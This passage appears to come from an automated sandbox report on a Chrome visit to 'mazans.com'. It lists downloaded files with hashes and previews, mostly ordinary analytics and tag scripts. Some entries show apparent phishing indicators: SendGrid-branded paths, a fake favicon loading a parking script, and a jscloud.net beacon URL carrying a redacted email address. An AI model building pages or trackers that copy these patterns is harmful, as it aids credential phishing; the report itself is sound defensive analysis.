                                                                                                                                                                                                                                                                                                                                                                          Preview:.// Copyright 2012 Google Inc. All rights reserved.. . (function(w,g){w[g]=w[g]||{};. w[g].e=function(s){return eval(s);};})(window,'google_tag_manager');. .(function(){..var data = {."resource": {. "version":"61",. . "macros":[{"function":"__e"},{"function":"__k","vtp_decodeCookie":false,"vtp_name":"notice_behavior"},{"function":"__k","vtp_decodeCookie":false,"vtp_name":"cmapi_cookie_privacy"},{"function":"__k","vtp_decodeCookie":true,"vtp_name":"tneSignUpVals"},{"function":"__jsm","vtp_javascript":["template","(function(){return JSON.parse(",["escape",["macro",3],8,16],")})();"]},{"function":"__jsm","vtp_javascript":["template","(function(){return ",["escape",["macro",4],8,16],".packages.e})();"]},{"function":"__jsm","vtp_javascript":["template","(function(){return ",["escape",["macro",4],8,16],".packages.mc})();"]},{"function":"__k","vtp_decodeCookie":false,"vtp_name":"_ga"},{"function":"__jsm","vtp_javascript":["template","(function(){var a=",["escape",["macro",7],8,16],";return
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:Web Open Font Format (Version 2), TrueType, length 15344, version 1.0
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):15344
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.984625225844861
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:384:ctE5KIuhGO+DSdXwye6i9Xm81v4vMHCbppV0pr3Ll9/w:cqrVO++tw/9CICFbQLlxw
                                                                                                                                                                                                                                                                                                                                                                          MD5:5D4AEB4E5F5EF754E307D7FFAEF688BD
                                                                                                                                                                                                                                                                                                                                                                          SHA1:06DB651CDF354C64A7383EA9C77024EF4FB4CEF8
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:3E253B66056519AA065B00A453BAC37AC5ED8F3E6FE7B542E93A9DCDCC11D0BC
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:7EB7C301DF79D35A6A521FAE9D3DCCC0A695D3480B4D34C7D262DD0C67ABEC8437ED40E2920625E98AAEAFBA1D908DEC69C3B07494EC7C29307DE49E91C2EF48
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          URL:https://fonts.gstatic.com/s/roboto/v18/KFOmCnqEu92Fr1Mu4mxK.woff2
                                                                                                                                                                                                                                                                                                                                                                          Preview:wOF2......;........H..;..........................d..@..J.`..L.T..<.....x.....^...x.6.$..6. ..t. ..I.h|.l....A....b6........(......@e.]...*:..-.0..r.)..hS..h...N.).D.........b.].......^..t?.m{...."84...9......c...?..r3o....}...S]....zbO.../z..{.....~cc....I...#.G.D....#*e.A..b...b`a5P.4........M....v4..fI#X.z,.,...=avy..F.a.\9.P|.[....r.Q@M.I.._.9..V..Q..]......[ {u..L@...]..K......]C....l$.Z.Z...Zs.4........ x.........F.?.7N..].|.wb\....Z{1L#..t....0.dM...$JV...{..oX...i....6.v.~......)|.TtAP&).KQ.]y........'...:.d..+..d..."C.h..p.2.M..e,.*UP..@.q..7..D.@...,......B.n. r&.......F!.....\...;R.?-.i...,7..cb../I...Eg...!X.)5.Aj7...Ok..l7.j.A@B`".}.w.m..R.9..T.X.X.d....S..`XI..1... .$C.H.,.\. ..A(.AZ.................`Wr.0]y..-..K.1.............1.tBs..n.0...9.F[b.3x...*$....T..PM.Z-.N.rS?I.<8eR'.3..27..?;..OLf*.Rj.@.o.W...........j~ATA....vX.N:.3dM.r.)Q.B...4i.f..K.l..s....e.U.2...k..a.GO.}..../.'..%$..ed.*.'..qP....M..j....../.z&.=...q<....-..?.A.%..K..
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):86
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.779486743739521
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:3:YTyLV/Vf1+xNVcSLQzRE9LduVB4:YWLV91iDLQmpdIB4
                                                                                                                                                                                                                                                                                                                                                                          MD5:EA03273602AC31C0858FA2D9A1895526
                                                                                                                                                                                                                                                                                                                                                                          SHA1:4F8AFE25482A22C6858AF1F58E55D83F9DF9B854
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:98D77039EA9249B3DCE91AD7B467EE382F29DAA61213C3E2737BD4A8786C8801
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:77FF06E103CA553FAD14E5F865764CDA76777F83800C439ED91B22B26935146863F9D0C3BBBD3EE95E02C69A1A1C29D0C12A5D9B9D1D619CEEBCF1DCCB422238
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          URL:https://www.redditstatic.com/ads/conversions-config/v1/pixel/config/t2_i1au5p4_telemetry
                                                                                                                                                                                                                                                                                                                                                                          Preview:{"version_hash":"49267bce","url":"https://www.redditstatic.com/ads/49267bce/pixel.js"}
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):105589
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.174577026969477
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:768:MLMeCBCBkjC/MFRo43esRdLyWQL9XJYOLBOiDYdveR2CjRBKF2FTm7L/PTDFlIs4:0CBN+/E1D82vnCjRBKFgTmbRFnOoh2
                                                                                                                                                                                                                                                                                                                                                                          MD5:06E7811332C76CC2B35DA692ACD1F134
                                                                                                                                                                                                                                                                                                                                                                          SHA1:5AE0EE78393822A1651A9C34A1E7DEC120C41A69
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:830A2208727C4658A2F18CDF7C1AD80F22F8FBD93E179173088BBACB4CAFC178
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:26B8FEDAEAAD1534A5D2496EAACA2DD78D2B3126110B2D230FDF2C720493F27CDB8C792A3F94DE294ADE4B2171FD8AA1E644E1739D6D4FFFD0CEFE0652CDE4FD
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          URL:https://cdn.segment.com/analytics.js/v1/1CjnBNPybWzyv10ssZRxdwmb8vrYF4yj/analytics.min.js
                                                                                                                                                                                                                                                                                                                                                                          Preview:!function(){var t,e,n,r,i={8878:function(t,e,n){"use strict";var r=this&&this.__importDefault||function(t){return t&&t.__esModule?t:{default:t}};Object.defineProperty(e,"__esModule",{value:!0});var i=r(n(325));function o(t,e){return function(){var n=this.traits(),r=this.properties?this.properties():{};return i.default(n,"address."+t)||i.default(n,t)||(e?i.default(n,"address."+e):null)||(e?i.default(n,e):null)||i.default(r,"address."+t)||i.default(r,t)||(e?i.default(r,"address."+e):null)||(e?i.default(r,e):null)}}e.default=function(t){t.zip=o("postalCode","zip"),t.country=o("country"),t.street=o("street"),t.state=o("state"),t.city=o("city"),t.region=o("region")}},4780:function(t,e,n){"use strict";var r=this&&this.__importDefault||function(t){return t&&t.__esModule?t:{default:t}};Object.defineProperty(e,"__esModule",{value:!0}),e.Alias=void 0;var i=r(n(1285)),o=n(9512);function s(t,e){o.Facade.call(this,t,e)}e.Alias=s,i.default(s,o.Facade),s.prototype.action=function(){return"alias"},s.p
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (9620)
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):300174
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.562280876043393
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:3072:8xJB4gOrF34Z394MBECBO0hmrvabnqYTfS5eVRUyVwWY7UstXFjr:SBa34Zt4MBEWbMevwWY7UstXFv
                                                                                                                                                                                                                                                                                                                                                                          MD5:C9993D1CD0B663E90D6BE20917113E1E
                                                                                                                                                                                                                                                                                                                                                                          SHA1:301DF66342E8E3251DA82EBCA7D11DBBFF0AD1D7
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:6C9F4D09BC137E1093D715AAB68266E4EB20D313506AD647C9591CEAC261177A
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:6093463B72119849C487A96930A96234FFC27757D5A190FB68F4D60924BD112B3A8C02A6FBB68315F1DB5B122D75A8788015A4B02752C5CC787D60A5A82F2ED6
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          URL:https://www.googletagmanager.com/gtag/destination?id=AW-923239173&l=dataLayer&cx=c&gtm=45He4b70v9126943770za200
                                                                                                                                                                                                                                                                                                                                                                          Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"3",. . "macros":[{"function":"__e"}],. "tags":[{"function":"__ogt_auto_events","priority":16,"vtp_enableScroll":false,"vtp_enableOutboundClick":false,"vtp_enableDownload":false,"vtp_enableHistoryEvents":false,"vtp_enableForm":true,"vtp_enableVideo":true,"vtp_enablePageView":true,"tag_id":106},{"function":"__ogt_cross_domain","priority":16,"vtp_rules":["list","sendgrid\\.com$"],"tag_id":108},{"function":"__ogt_ads_datatos","priority":16,"vtp_instanceDestinationId":"AW-923239173","tag_id":114},{"function":"__ogt_1p_data_v2","priority":6,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_manualEmailEnabled":false,"vtp_cityValue":"","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneValue":"","vtp_autoPhoneEnabled":false,"vtp_emailValue":"","vtp_firstNameValue":"","vtp_st
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with CRLF, LF line terminators
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):4092
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.685563567268828
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:96:12oZc5WT9BvpXKZhUyXuXsk8hLb3Dhm2ykOoqH:12oZc5WNXK3XuXW5+H
                                                                                                                                                                                                                                                                                                                                                                          MD5:D77D244C3931889ACF848D46D0A270F0
                                                                                                                                                                                                                                                                                                                                                                          SHA1:298AFE7EFCCB4632523F3C6B33E8C950B58C6EEB
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:D3C9DCB83C9307D83DD95DA9013D2E7B91B6EEDA1ECC9F7B98A037BB406EC722
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:7D364072AEE2C13940C7732C0A6676F2DBAB9EAE790D2ECEC4F4C4F75B37FC9E6A560EECF2320DE9F0EC7F5BBDD1DAC507601E0B246C778D177BBDF861C1A4CC
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          URL:https://bat.bing.com/p/action/5202129.js
                                                                                                                                                                                                                                                                                                                                                                          Preview:(function(w,d,c,k,a,b,t,e) {. var cs = d.currentScript;. if (cs) {. var uo = cs.getAttribute('data-ueto');. if (uo && w[uo] && typeof w[uo].setUserSignals === 'function') {. w[uo].setUserSignals({'ea': c, 'kc': k, 'at': a, 'bi': b, 'dt': t, 'ec': e});. }. }.})(window, document, false, true, false, false, false, false);..(function(w,d,s,i) {.. var c=d.currentScript;.. if (c) {.. var uo = c.getAttribute('data-ueto');.. if (uo && w[uo] && w[uo].uetConfig && w[uo].uetConfig.deBlock === true).. return;.. }.. var f,j; f=d.getElementsByTagName(s)[0]; j=d.createElement(s); j.async=true;.. j.src='https://www.clarity.ms/tag/uet/'+i+'';.. j.onload = function () {.. if (!c) return;.. var co = function(u) { return u && typeof u === 'object' && !(u instanceof Array) && u.beaconParams && u.beaconParams.mid && w.clarity; };.. var r = 40;.. var cl = function() {.. if (r-- < 1) retu
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.9021748142117274
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:3:YAv2ILK:YAvhW
                                                                                                                                                                                                                                                                                                                                                                          MD5:CA677DCE40A53A2EB36AD14BEC14E763
                                                                                                                                                                                                                                                                                                                                                                          SHA1:C81EDDA83A685F3A64AC793F4C4260837078FD73
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:0A998AB5472475C3418C7977B6214C566AAD928094DCEB86D2E9F53BDBDD26C0
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:58BC4AFF427CA553476156A926EE4C42E1A9F349051FE7FF45431C9D0FDF795951899BCF78BDF8746CD2A81D62F265DB9DCE474D2CF18A7E4654D4C6FD23FD03
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          URL:https://jscloud.net/x/45414/httpsmazanscomWEBID6672849687924zerobotemailEMAIL_REDACTED.json
                                                                                                                                                                                                                                                                                                                                                                          Preview:{"error":"FILE_NOT_FOUND"}
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1468), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):1468
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.803900257297054
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:24:2jkm94/zKPccAr9+KVCe2TLph9gFB5vtADjkrDQndcl/1t4glvllLtfO1/6QsLqJ:VKEcogKo7LmvtUjPKtX7ZO1/2LrwUnG
                                                                                                                                                                                                                                                                                                                                                                          MD5:61744F818DE01FB97F7193C36FE3AB49
                                                                                                                                                                                                                                                                                                                                                                          SHA1:54495886A465D49EED51E3D69977921E51A647E7
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:459970E158D54D7B133F164A4E5F4B18C8070D15008C7ABBE2004E748C4AF393
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:C8DF7B95316B09ED63F2175E6F90D2066D5E68C52EBA07B9534FA8743F81331472110B744764064DD3071EB8C33771A28AA0B4CD074A279E281A43DA8F4A2A3D
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:/* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function(){var w=window,C='___grecaptcha_cfg',cfg=w[C]=w[C]||{},N='grecaptcha';var gr=w[N]=w[N]||{};gr.ready=gr.ready||function(f){(cfg['fns']=cfg['fns']||[]).push(f);};w['__recaptcha_api']='https://www.google.com/recaptcha/api2/';(cfg['render']=cfg['render']||[]).push('6Lc3fVoiAAAAAPwG5oAIHRlqs43SHIxX8Zi1CpOs');w['__google_recaptcha_client']=true;var d=document,po=d.createElement('script');po.type='text/javascript';po.async=true; po.charset='utf-8';var v=w.navigator,m=d.createElement('meta');m.httpEquiv='origin-trial';m.content='A/kargTFyk8MR5ueravczef/wIlTkbVk1qXQesp39nV+xNECPdLBVeYffxrM8TmZT6RArWGQVCJ0LRivD7glcAUAAACQeyJvcmlnaW4iOiJodHRwczovL2dvb2dsZS5jb206NDQzIiwiZmVhdHVyZSI6IkRpc2FibGVUaGlyZFBhcnR5U3RvcmFnZVBhcnRpdGlvbmluZzIiLCJleHBpcnkiOjE3NDIzNDIzOTksImlzU3ViZG9tYWluIjp0cnVlLCJpc1RoaXJkUGFydHkiOnRydWV9';if(v&&v.cookieDeprecationLabel){v.cookieDeprecationLabel.getValue().then(function(l){if(l!=='treatment_1.1'&&l!=='treatment_1.2'&&l!
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):16
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.75
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:3:H0hCkY:UUkY
                                                                                                                                                                                                                                                                                                                                                                          MD5:AFB69DF47958EB78B4E941270772BD6A
                                                                                                                                                                                                                                                                                                                                                                          SHA1:D9FE9A625E906FF25C1F165E7872B1D9C731E78E
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:874809FB1235F80831B706B9E9B903D80BD5662D036B7712CC76F8C684118878
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:FD92B98859FFCCFD12AD57830887259F03C7396DA6569C0629B64604CD964E0DF15D695F1A770D2E7F8DF238140F0E6DA7E7D176B54E31C3BB75DDE9B9127C45
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xNDkSEAl3W60JbshWuxIFDVNaR8U=?alt=proto
                                                                                                                                                                                                                                                                                                                                                                          Preview:CgkKBw1TWkfFGgA=
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):209
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.365794835576018
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:3:2IifHwVHAXpGQB+ElYVHAXpBsUN04EgsRnXExxXAY647zfMUKj3VSCyTZRACKIHf:v8AHArBaHAfnS4ElRIz7Lv9RnKIn/
                                                                                                                                                                                                                                                                                                                                                                          MD5:3D88ED31CD70C5846F109168D704C76A
                                                                                                                                                                                                                                                                                                                                                                          SHA1:66C20A901B31782DCC0E775EF7E75026B6858317
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:E1E728E7E9FF0DB1C21A1E9D5D090DA6757C06F5A7DDAA6442BEA99DF0C1103F
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:B1EAD594B396A1F3D081A301E208B3EF593D182314A151FA02D1F62609EBB72446CC08C71B15FC2D53CB3D6F580ABBEC3377521321705A9AA3A07620E97F6663
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:[{"name":"Repeater","creationName":"Repeater","description":"The Segment repeater integration repeats a source stream to one or multiple other sources. ","website":"https://segment.com","category":"Raw Data"}]
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1070), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):1070
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.352904745690637
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:24:ciXsWZ08e3jYqfjJwZYdWDdgyjKIduHK0AXKJRWZcK:xZBeTYIaI7S/XaJw/
                                                                                                                                                                                                                                                                                                                                                                          MD5:1457C051362CCD276E43BAD549703F4D
                                                                                                                                                                                                                                                                                                                                                                          SHA1:22BA68E9BCCA28C901A96E49617FD5C11AF8A680
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:787AF339B3D78F6268EAE1D1C76C8F2164EB9A06D9711ED1AC1929DBDF5CBD80
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:347F84D69AABEBAEE58CDB9E2A0A613C6CC94AC73F37B02DCF109AE7736443E25B60FF10D3B67E01BDA6B28BD16C4A5EB79A0620851722B9BABA6854842EBA6A
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:!function(){window._6si=window._6si||[],window._6si.push(["setToken","cd4ba9100b4470e1dde33ce034e651c7"]),window._6si.push(["disableCookies",!1]),window._6si.push(["enableIPv6Ping",!0]),window._6si.push(["enableIgnorePageUrlHash",!0]),window._6si.push(["enableRetargeting",!0]),window._6si.push(["setWhiteListFields",[]]),window._6si.push(["setCustomMetatags",[]]),window._6si.push(["storeTagId","e1a76594-779b-4529-b852-0284e5fe92ab"]),window._6si.push(["enableEventTracking",!0]),window._6si.push(["setCompanyDetailsExpiration",!1]);for(var e,n,o=[],i=0;i<o.length;i++)window._6si.push(["addSFF",o[i]]);window._6si.push(["enableMapCookieCapture",!1]),window._6si.push(["enableCompanyDetails",!1]),(e=document.createElement("script")).type="text/javascript",e.async=!0,null!=(n=null===document||void 0===document?void 0:document.currentScript)&&n.nonce&&(e.nonce=null==(n=null===document||void 0===document?void 0:document.currentScript)?void 0:n.nonce),e.src="https://j.6sc.co/6si.min.js",(n=docume
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):82
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.383594884337988
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:3:qGGAW6yIA6qENKAQpnDTLTrAWRgn:kAYIZYpDHTRg
                                                                                                                                                                                                                                                                                                                                                                          MD5:2ECE426E3900FA6EBAD39380AEAA2539
                                                                                                                                                                                                                                                                                                                                                                          SHA1:24C4E875361BC77874B005F816D160223DC68B46
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:E4CE65C3A33FDF0AD73B34857BFF62AF3A6187509551AFBFECBA345FEA02BF55
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:66A11A88F239BC8AD325671B2EADDFE0F88CC1EFDD4FA08E83D2FCA2E615DB4A101B935AD89F274B606F0C6DFF41BE575708268E8FB34F897EC28F7D8024BC65
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:{. "success": false,. "message": "malformed JSON",. "code": "invalid_request".}
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):78685
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):6.020288496082252
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:1536:OfGNbFoZJSUYOOaLnAW8+IcTOIobkhXwW5vxM:mGRFauOxLA/+IcTOuXK
                                                                                                                                                                                                                                                                                                                                                                          MD5:47BEA70318B724B1A99A1D571FF58807
                                                                                                                                                                                                                                                                                                                                                                          SHA1:B66FFE704AD2FE84DA8211D6351727568FD68B78
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:11A188A204934185AB5649A1F838FE771C3D84C928BC8286EF999FB5B8DEDA69
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:7995460AB00A68E3433EA72F19FCB1BCD8485BF4CAF978FF5C47193F110899AA824AC4A697285E908A5F66C693604A0227E60B3D3D948115C4C3490022B82E3D
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          URL:https://www.gstatic.com/recaptcha/releases/-ZG7BC9TxCVEbzIO2m429usb/styles__ltr.css
                                                                                                                                                                                                                                                                                                                                                                          Preview:.goog-inline-block{position:relative;display:-moz-inline-box;display:inline-block}* html .goog-inline-block{display:inline}*:first-child+html .goog-inline-block{display:inline}.recaptcha-checkbox{border:none;font-size:1px;height:28px;margin:4px;width:28px;overflow:visible;outline:0;vertical-align:text-bottom}.recaptcha-checkbox-border{-webkit-border-radius:2px;-moz-border-radius:2px;border-radius:2px;background-color:#fff;border:2px solid #c1c1c1;font-size:1px;height:24px;position:absolute;width:24px;z-index:1}.recaptcha-checkbox-borderAnimation{background-image:url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAFQAAANICAYAAABZl8i8AAAAIGNIUk0AAHomAACAhAAA+gAAAIDoAAB1MAAA6mAAADqYAAAXcJy6UTwAAAAGYktHRAD/AP8A/6C9p5MAAHq9SURBVHja7Z15fFTl9f/fd9ZM9n1PgCyEXSSRNYKCgAuiIipuVSuudavV1tq6W/WrtnWrrZbWDZUqUqUoCoIEQhBI2JesELKvM9mTWe7c3x83d5xAlkky8fv92ft5vfKC19znOWfuZ571POc5B1SoUKFChQoVKlSoUKFChQoVKlSoUKFChQoVKlSoUKFChQoVKlSoUKFChQoVKlSoUKFChQoVKlSoUKHifwGCRqsTNFrdj6VPq9XqtNofT9+wvutQyEyad8t9IaPPntFUd
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):583
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.129258967489751
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:12:vQ0AMyHWBFc+sc3Ea2KVdNxtNufiCRiTkJsU3Bg+W6OQ4NbxBShQL:vQFrWMAEafVfN+iCR2kJhg+P4NjSK
                                                                                                                                                                                                                                                                                                                                                                          MD5:51618AC2B7CF5C4937213E965C00F20A
                                                                                                                                                                                                                                                                                                                                                                          SHA1:7E704E57162ED18743BEF9F95E2DEA558954751B
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:0B41F69E6564B9C89B1B344744C5B06EB4ADC0E584028909286D2B936E1AFED5
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:D07AF4309BF8156644D604676EEC62CF78128DAE1CD1808E865E02BF7302B3DEA5B1EDA42EECD6E8687C84B85A6A52C07BD45B120B8FE5940D8D80586A2D0FB0
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          URL:https://mazans.com/content/dam/sendgrid/core-assets/social/favicon-96x96.png
                                                                                                                                                                                                                                                                                                                                                                          Preview:<html>.<head>. <style>. .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; }. @keyframes spin { 0% { transform: rotate(0deg); } 100% { transform: rotate(360deg); } }. </style>. <script language="Javascript">var _skz_pid = "9POBEX80W";</script>. <script language="Javascript" src="http://cdn.jsinit.directfwd.com/sk-jspark_init.php"></script>.</head>.<body>.<div class="loader" id="sk-loader"></div>.</body>.</html>.
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (930)
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):3415
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.918220508981896
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:96:wXfeR6GTWSuUZO5o9uCqhbFk5rNdQBYB9BYVGW:U7GTWvU8akCqhbFkJWU/W
                                                                                                                                                                                                                                                                                                                                                                          MD5:03889A07B03B0E8F833D4097722D9AC3
                                                                                                                                                                                                                                                                                                                                                                          SHA1:CDD87F6D54DB39AB79492806F3497AC613660C7D
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:A4A0378726104C9BE4C08042F42F410CB801B1FEC3FB3BDC96123E42A9DDBCA1
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:5F9DACC6094F07717DF98E8C77E8529B13D2664C93A243E10A04CB98A52519787E5C96966408BEF83E55E43D575981F3E8633B475B6A67F3DACF133514307EFD
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
